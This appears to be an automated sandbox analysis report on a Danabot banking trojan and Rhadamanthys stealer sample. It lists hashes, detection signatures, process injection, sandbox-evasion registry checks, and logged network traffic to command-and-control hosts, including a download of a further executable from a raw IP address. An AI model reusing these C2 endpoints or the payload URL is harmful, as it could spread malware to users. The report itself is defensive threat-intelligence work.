danabot | 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f

Analysis

max time kernel
150s
max time network
147s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
17/12/2022, 05:35 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
Size

214KB
MD5

e05542960134ab0160c8c7f7a17aca89
SHA1

58ece723af6a27e0125b846ea6b3edd5f64fe241
SHA256

5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f
SHA512

dc24e81ea1aee15e756347728914ee49b52ccb335ce1dc5e256d4e14a69ef1eb108aeb5067090edafb2c0fc1a8b8c7ecd8798a0c37721c79c5ea38c508f363e2
SSDEEP

3072:n5j8GLg0XpaaTR2R/5uxsppYxiq8LszNKq/o40zwUzQRKF+:5JLg0XMRY6Ip8gzUQo40M2b

Score

10^/10

danabot rhadamanthys banker stealer trojan

Malware Config

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Detect rhadamanthys stealer shellcode 2 IoCs

resource	yara_rule
behavioral1/memory/4980-574-0x0000000001100000-0x000000000111D000-memory.dmp	family_rhadamanthys
behavioral1/memory/4140-594-0x00000000029C0000-0x00000000029DD000-memory.dmp	family_rhadamanthys

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4308 created 2500	4308	6E5B.exe	34

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1212	21EF.exe
4536	Eewfhetyyyrtfpd.exe
4308	6E5B.exe

Deletes itself 1 IoCs

pid	Process
2952	Process not Found

Loads dropped DLL 1 IoCs

pid	Process
4308	6E5B.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4980	ngentask.exe
4980	ngentask.exe
4980	ngentask.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1212 set thread context of 4192	1212	21EF.exe	68
PID 4308 set thread context of 4980	4308	6E5B.exe	73

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	Process not Found

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ngentask.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ngentask.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	ngentask.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	ngentask.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ngentask.exe

Checks processor information in registry 2 TTPs 43 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	21EF.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	21EF.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	21EF.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	21EF.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	21EF.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	21EF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Process not Found

Modifies registry class 20 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2952	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
328	5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
328	5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found
2952	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2952	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
328	5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4536	Eewfhetyyyrtfpd.exe
Token: SeShutdownPrivilege	4980	ngentask.exe
Token: SeCreatePagefilePrivilege	4980	ngentask.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4536	Eewfhetyyyrtfpd.exe
4192	rundll32.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
4536	Eewfhetyyyrtfpd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2952	Process not Found
2952	Process not Found

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2952 wrote to memory of 1212	2952	Process not Found	66
PID 2952 wrote to memory of 1212	2952	Process not Found	66
PID 2952 wrote to memory of 1212	2952	Process not Found	66
PID 1212 wrote to memory of 4536	1212	21EF.exe	67
PID 1212 wrote to memory of 4536	1212	21EF.exe	67
PID 1212 wrote to memory of 4536	1212	21EF.exe	67
PID 1212 wrote to memory of 4192	1212	21EF.exe	68
PID 1212 wrote to memory of 4192	1212	21EF.exe	68
PID 1212 wrote to memory of 4192	1212	21EF.exe	68
PID 1212 wrote to memory of 4192	1212	21EF.exe	68
PID 2952 wrote to memory of 4308	2952	Process not Found	70
PID 2952 wrote to memory of 4308	2952	Process not Found	70
PID 2952 wrote to memory of 4308	2952	Process not Found	70
PID 4308 wrote to memory of 656	4308	6E5B.exe	71
PID 4308 wrote to memory of 656	4308	6E5B.exe	71
PID 4308 wrote to memory of 656	4308	6E5B.exe	71
PID 4308 wrote to memory of 3988	4308	6E5B.exe	72
PID 4308 wrote to memory of 3988	4308	6E5B.exe	72
PID 4308 wrote to memory of 3988	4308	6E5B.exe	72
PID 4308 wrote to memory of 4980	4308	6E5B.exe	73
PID 4308 wrote to memory of 4980	4308	6E5B.exe	73
PID 4308 wrote to memory of 4980	4308	6E5B.exe	73
PID 4308 wrote to memory of 4980	4308	6E5B.exe	73
PID 4308 wrote to memory of 4980	4308	6E5B.exe	73
PID 4308 wrote to memory of 4140	4308	6E5B.exe	74
PID 4308 wrote to memory of 4140	4308	6E5B.exe	74
PID 4308 wrote to memory of 4140	4308	6E5B.exe	74
PID 4308 wrote to memory of 4140	4308	6E5B.exe	74

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2500
- C:\Windows\SYSWOW64\fontview.exe
  "C:\Windows\SYSWOW64\fontview.exe"
  2⤵
  PID:4140

C:\Users\Admin\AppData\Local\Temp\5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
"C:\Users\Admin\AppData\Local\Temp\5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:328

C:\Users\Admin\AppData\Local\Temp\21EF.exe
C:\Users\Admin\AppData\Local\Temp\21EF.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1212
- C:\Users\Admin\AppData\Local\Temp\Eewfhetyyyrtfpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Eewfhetyyyrtfpd.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4536
- C:\Windows\syswow64\rundll32.exe
  "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  PID:4192

C:\Users\Admin\AppData\Local\Temp\6E5B.exe
C:\Users\Admin\AppData\Local\Temp\6E5B.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4308
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
  2⤵
  PID:656
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
  2⤵
  PID:3988
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
  PID:4980

Network

DNS

dowe.at

Remote address:

8.8.8.8:53

Request

dowe.at

IN A

Response

dowe.at

IN A

91.195.240.101
POST

http://dowe.at/tmp/

Remote address:

91.195.240.101:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qlcbvelr.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: dowe.at

Response

HTTP/1.1 403 Forbidden

date: Sat, 17 Dec 2022 05:35:58 GMT
content-type: text/html
content-length: 150
vary: Accept-Encoding
server: NginX
DNS

xisac.com

Remote address:

8.8.8.8:53

Request

xisac.com

IN A

Response

xisac.com

IN A

211.171.233.126

xisac.com

IN A

181.94.48.228

xisac.com

IN A

222.236.49.123

xisac.com

IN A

138.36.3.134

xisac.com

IN A

201.124.230.1

xisac.com

IN A

190.219.54.242

xisac.com

IN A

58.235.189.192

xisac.com

IN A

109.102.255.230

xisac.com

IN A

211.119.84.112

xisac.com

IN A

37.34.248.24
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oessper.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 368
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:35:59 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 8
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jkmitbrhc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 160
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:01 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qioqgbmo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:03 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jbexoomcu.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 322
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:04 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gvavmx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 158
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:06 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 42
Connection: close
Content-Type: text/html; charset=utf-8
GET

http://149.3.170.140/rokki.exe

Remote address:

149.3.170.140:80

Request

GET /rokki.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 149.3.170.140

Response

HTTP/1.1 200 OK

Server: nginx/1.10.3
Date: Sat, 17 Dec 2022 05:36:07 GMT
Content-Type: application/octet-stream
Content-Length: 5848576
Last-Modified: Sat, 17 Dec 2022 05:30:02 GMT
Connection: keep-alive
ETag: "639d53da-593e00"
Accept-Ranges: bytes
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ubdjjvai.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 132
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:10 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://arggql.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:11 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ryjtwlihhh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:13 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://orocfopgy.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 228
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:14 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yjkouhsq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 358
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://xisac.com/tmp/

Remote address:

211.171.233.126:80

Request

POST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vcjpawlhrr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 277
Host: xisac.com

Response

HTTP/1.0 404 Not Found

Date: Sat, 17 Dec 2022 05:36:21 GMT
